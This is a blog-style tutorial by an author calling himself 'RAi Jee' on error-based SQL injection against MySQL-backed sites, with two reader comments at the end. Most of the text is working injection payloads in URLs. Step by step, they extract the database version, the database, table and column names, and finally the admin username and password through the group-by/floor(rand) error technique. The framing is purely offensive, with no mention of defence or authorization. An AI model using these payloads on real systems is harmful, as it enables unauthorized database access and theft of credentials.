Error Based Injection -Tutorial BY RAi Jee
After Union Based Injection In this Tutorial You Will Learn Error Based SQL Injection.
How You Will Understand That Our Target WebSite is in Error Based Injection.??
Hmm While we are Injecting Site , And Count Total Number of Columns and Then Build our Union Based SQL Query .
We got 6 Number of Columns. and our UNION BASED Query.
http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -
When we Execute our Union Based Query it doesn't Give us any Vulnerable Column Number Printed on The Webpage or in HTML.
It Gives us A Error Message .
The used SELECT statements have a different number of columns
Sometimes The TARGET site not Give Any Vulnerable Column Number And Also Not Any Kind of Error . Those Sites Are Also Error Based / Double Query SQL injection .
So We Processed Next With Error Based Queries.
1st Step is To Get Version.
Here is The Error Based Query To Get The Version.
http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
and we Will Get The Version Printed on The WebPage.
2nd Step is To Get Database Name.
Now Lets Check the Current Database Name.
A Website can Have More than 2 , 3 or 5 Databases. So We Use LIMIT to get all The Databases.
LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
Here is Our Query To Get The Database.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
3rd Step Is to Get The Tables .
Now We Have To Get The Tables. As We Want Tables From Primary Database .
Here Is The Query For Tables From Primary Database.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
Until You Get Your Desired Table Name .
4th Step Is to Get The Column Names From Our Targeted Table Name.
Now We Have to Get The Column Names From The Table Name.
We Got Table Of Admin.
So Lets Get The Columns From Table Admin .
Here Is The Query For Getting Column Names From The Table Admin.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can Execute Our Query.
Here Is that PART in Our Query.
Table_name=ADMIN
Here Is The HEX Value of ADMIN=61646d696e
And Put it With 0x to Build Our Correct Query.
Table_name=0x61646d696e
And Here Is The Query.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1
until we Get The Column Name Like Username and Password.
5Th Step Is to Extracting Data From Columns .
After We Get The Column names Like Username And Password.
Next Step Is To Extract Data From These Columns.
Here is The Query For Extracting Data from Columns.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
WE Put The TABLENAME=Admin
And
Column_name_1=username
Column_name_2=password
So Here is The FINAL QUERY .
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
And We Get The ADMIN username and Password printed on the Page.
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
Nice One.
ReplyDeleteIs there any vulnerable app to test the same.
This comment has been removed by the author.
ReplyDelete